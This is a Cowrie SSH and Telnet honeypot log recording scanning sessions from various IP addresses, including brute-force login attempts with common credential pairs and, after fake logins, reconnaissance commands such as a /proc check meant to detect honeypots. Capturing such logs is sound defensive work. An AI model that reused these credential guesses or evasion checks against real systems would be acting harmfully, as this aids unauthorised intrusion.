{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:59:45.824011Z","src_ip":"194.233.79.134","session":"cd7173b5614a"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1qaz@WSX","message":"login attempt [oracle/1qaz@WSX] failed","sensor":"my-vps","timestamp":"2025-08-28T01:59:47.278997Z","src_ip":"194.233.79.134","session":"cd7173b5614a"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:59:48.535918Z","src_ip":"194.233.79.134","session":"cd7173b5614a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55838,"dst_ip":"1.2.3.4","dst_port":22,"session":"39b1d8fd0b3e","protocol":"ssh","message":"New connection: 217.72.205.35:55838 (1.2.3.4:22) [session: 39b1d8fd0b3e]","sensor":"my-vps","timestamp":"2025-08-28T02:00:12.326228Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:00:12.327306Z","src_ip":"217.72.205.35","session":"39b1d8fd0b3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59854,"dst_ip":"1.2.3.4","dst_port":22,"session":"52e3f01dff42","protocol":"ssh","message":"New connection: 212.227.235.229:59854 (1.2.3.4:22) [session: 52e3f01dff42]","sensor":"my-vps","timestamp":"2025-08-28T02:00:54.734035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:00:54.735018Z","src_ip":"212.227.235.229","session":"52e3f01dff42"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T02:00:54.843475Z","src_ip":"212.227.235.229","session":"52e3f01dff42"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123","message":"login attempt [app/app123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:00:55.166146Z","src_ip":"212.227.235.229","session":"52e3f01dff42"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:00:56.275366Z","src_ip":"212.227.235.229","session":"52e3f01dff42"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":50702,"dst_ip":"1.2.3.4","dst_port":23,"session":"bd4ea72b0fb4","protocol":"telnet","message":"New connection: 79.124.8.120:50702 (1.2.3.4:23) [session: bd4ea72b0fb4]","sensor":"my-vps","timestamp":"2025-08-28T02:01:01.895128Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:01:01.935760Z","src_ip":"79.124.8.120","session":"bd4ea72b0fb4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:01:02.074726Z","src_ip":"79.124.8.120","session":"bd4ea72b0fb4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63667,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6dc41c52e6e","protocol":"ssh","message":"New connection: 212.227.235.229:63667 (1.2.3.4:22) [session: d6dc41c52e6e]","sensor":"my-vps","timestamp":"2025-08-28T02:01:15.831959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T02:01:15.832751Z","src_ip":"212.227.235.229","session":"d6dc41c52e6e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T02:01:15.959656Z","src_ip":"212.227.235.229","session":"d6dc41c52e6e"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"jM8vF4aZ9uQ1sZ5","message":"login attempt [ubnt/jM8vF4aZ9uQ1sZ5] failed","sensor":"my-vps","timestamp":"2025-08-28T02:01:16.552045Z","src_ip":"212.227.235.229","session":"d6dc41c52e6e"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"test","message":"login attempt [ubnt/test] failed","sensor":"my-vps","timestamp":"2025-08-28T02:01:17.681800Z","src_ip":"212.227.235.229","session":"d6dc41c52e6e"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"Qwerty12","message":"login attempt [ubnt/Qwerty12] failed","sensor":"my-vps","timestamp":"2025-08-28T02:01:18.811401Z","src_ip":"212.227.235.229","session":"d6dc41c52e6e"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"uM6kS5wE0mH4kD8","message":"login attempt [ubnt/uM6kS5wE0mH4kD8] failed","sensor":"my-vps","timestamp":"2025-08-28T02:01:19.941900Z","src_ip":"212.227.235.229","session":"d6dc41c52e6e"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":45016,"dst_ip":"1.2.3.4","dst_port":22,"session":"1484c42eb2ab","protocol":"ssh","message":"New connection: 194.233.79.134:45016 (1.2.3.4:22) [session: 1484c42eb2ab]","sensor":"my-vps","timestamp":"2025-08-28T02:01:20.115661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:01:20.182151Z","src_ip":"194.233.79.134","session":"1484c42eb2ab"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"qwerty123456","message":"login attempt [ubnt/qwerty123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:01:21.071232Z","src_ip":"212.227.235.229","session":"d6dc41c52e6e"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:01:22.208825Z","src_ip":"212.227.235.229","session":"d6dc41c52e6e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:01:26.863583Z","src_ip":"194.233.79.134","session":"1484c42eb2ab"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-28T02:01:28.365122Z","src_ip":"194.233.79.134","session":"1484c42eb2ab"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:01:29.766718Z","src_ip":"194.233.79.134","session":"1484c42eb2ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37188,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8a72cd6ff95","protocol":"ssh","message":"New connection: 212.227.235.229:37188 (1.2.3.4:22) [session: c8a72cd6ff95]","sensor":"my-vps","timestamp":"2025-08-28T02:02:22.166805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:02:22.228432Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T02:02:22.395652Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.login.success","username":"root","password":"123123123","message":"login attempt [root/123123123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:02:23.356792Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:02:23.894793Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T02:02:23.895638Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T02:02:23.896194Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T02:02:23.898619Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T02:02:23.899444Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T02:02:23.901047Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T02:02:23.902259Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T02:02:23.903292Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T02:02:23.904355Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T02:02:23.906935Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T02:02:23.908050Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T02:02:24.064770Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:02:24.065711Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:02:24.067055Z","src_ip":"212.227.235.229","session":"c8a72cd6ff95"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":45430,"dst_ip":"1.2.3.4","dst_port":22,"session":"85daf4e5af34","protocol":"ssh","message":"New connection: 194.233.79.134:45430 (1.2.3.4:22) [session: 85daf4e5af34]","sensor":"my-vps","timestamp":"2025-08-28T02:02:56.721220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:02:56.866987Z","src_ip":"194.233.79.134","session":"85daf4e5af34"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:02:56.890152Z","src_ip":"194.233.79.134","session":"85daf4e5af34"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink123","message":"login attempt [flink/flink123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:02:58.761526Z","src_ip":"194.233.79.134","session":"85daf4e5af34"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:03:00.100909Z","src_ip":"194.233.79.134","session":"85daf4e5af34"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.240.46","src_port":54774,"dst_ip":"1.2.3.4","dst_port":22,"session":"aaf84775775f","protocol":"ssh","message":"New connection: 77.83.240.46:54774 (1.2.3.4:22) [session: aaf84775775f]","sensor":"my-vps","timestamp":"2025-08-28T02:03:29.628741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:03:29.629599Z","src_ip":"77.83.240.46","session":"aaf84775775f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T02:03:29.642976Z","src_ip":"77.83.240.46","session":"aaf84775775f"}
{"eventid":"cowrie.login.success","username":"root","password":"eve","message":"login attempt [root/eve] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:03:29.686798Z","src_ip":"77.83.240.46","session":"aaf84775775f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:03:29.732149Z","src_ip":"77.83.240.46","session":"aaf84775775f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T02:03:29.733085Z","src_ip":"77.83.240.46","session":"aaf84775775f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:03:29.748573Z","src_ip":"77.83.240.46","session":"aaf84775775f"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:03:29.749797Z","src_ip":"77.83.240.46","session":"aaf84775775f"}
{"eventid":"cowrie.session.connect","src_ip":"156.227.27.55","src_port":56192,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bfea273545d","protocol":"ssh","message":"New connection: 156.227.27.55:56192 (1.2.3.4:22) [session: 1bfea273545d]","sensor":"my-vps","timestamp":"2025-08-28T02:03:59.716467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T02:03:59.717343Z","src_ip":"156.227.27.55","session":"1bfea273545d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T02:04:00.361501Z","src_ip":"156.227.27.55","session":"1bfea273545d"}
